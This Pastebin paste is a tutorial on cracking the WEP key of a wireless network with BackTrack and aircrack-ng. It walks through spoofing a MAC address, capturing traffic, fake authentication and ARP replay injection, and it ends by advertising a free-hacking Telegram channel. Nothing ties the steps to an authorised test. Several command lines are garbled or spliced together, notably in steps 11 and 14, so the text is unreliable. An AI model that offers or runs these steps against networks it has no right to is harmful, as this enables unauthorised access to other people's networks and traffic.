Advertisement
Ben_salam

HOW TO CRACK WEP KEY

Feb 17th, 2020
2,620
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XBasic 2.57 KB | None | 0 0
  1. Hey welcome
  2. I hope you are all well!? thank God
  3.  This tutorial will explain that how to crack wep key using Backtrack..!!
  4. What is BackTrack (Kali)??
  5.  
  6. BackTrack was a Linux distribution that focused on security aimed at digital forensics and penetration testing use.
  7. OK let's start!!
  8.  
  9.  
  10. Step 1:-
  11.  
  12. First Download Backtrack
  13.  
  14. https://www.backtrack-linux.org/
  15.  
  16. Step 2:-
  17.  
  18. Burn the iso image on CD and boot your laptop from CD drive
  19.  
  20. Step 3:-
  21.  
  22. Select the third boot option(VESA/KDE).
  23.  
  24. Step 4:-
  25.  
  26. Once in BT3, click the tiny black box in the lower left corner to load up a “Konsole” window.
  27.  
  28. Step 5:-
  29.  
  30. Type the following command
  31. airmon-ng
  32. Note down the interface name. In this example wifi0
  33.  
  34. Step 6:-
  35.  
  36. airmon-ng stop wifi0
  37.  
  38. Step 7:-
  39.  
  40. ifconfig wifi0 down
  41.  
  42. Step 8:-
  43.  
  44. macchanger –mac 00:11:22:33:44:66 wifi0
  45.  
  46. Step 9:-
  47.  
  48. airmon-ng start wifi0
  49.  
  50. Step 10:-
  51.  
  52. airodump-ng wifi0
  53. This will start populating Wifi networks. Press Ctrl + C to stop.
  54. Check the network with WEP encryption.
  55. Notedown BSSID, CH and ESSID somewhere in notepad or paper
  56. Note that if the same BSSID is available in the second part with STATION associated with it,
  57. means you some one is accessing that network and our task will be little easier.
  58. If not than don’t worry we will still crack it.
  59.  
  60. Step 11:-
  61.  
  62. airodump-ng -c (channel) -w (file name)
  63. Replace
  64. (channel) with the CH which u had already n
  65. (file name) with any name of your choice
  66. (bssid) with the BSSID which u had already note
  67. –bssid (bssid) wifi0
  68. Note it
  69. Leave this console as it is and start new konsole
  70.  
  71. Step 12:-
  72.  
  73. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
  74. If you don’t get Association Successful message then keep on trying until you got success.
  75.  
  76. Step 13:-
  77.  
  78. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
  79. Well if you don’t see ARP ACK and sent packets are not increasing
  80. or still 0 than it means no 1 is accessing that network.
  81. But don’t worry you go an optional step,
  82. Leave this console as it is and start new k
  83.  
  84. Step 14:-
  85.  
  86. aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
  87. konsole
  88. message than keep on trying until you get success got an optional step
  89. konsole
  90. –b (bssid) –h 00:11:22:33:44:66 wfi0
  91. Press y and enter
  92. Now you will see that ARP and ACK packets in 2nd console are increasing fast
  93. Keep this console as it is and start 4th console.
  94.  
  95. Step 15:-
  96.  
  97. aircrack-ng -b (bssid) (filename)-
  98. Just wait and watch…..Backtrack will do rest of the work.
  99. Hurray we got the key.
  100.  
  101. Done..!!
  102. Thanks
  103. Join our telegram channel using this link
  104.  
  105.    https://t.me/Learnfreehacking0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement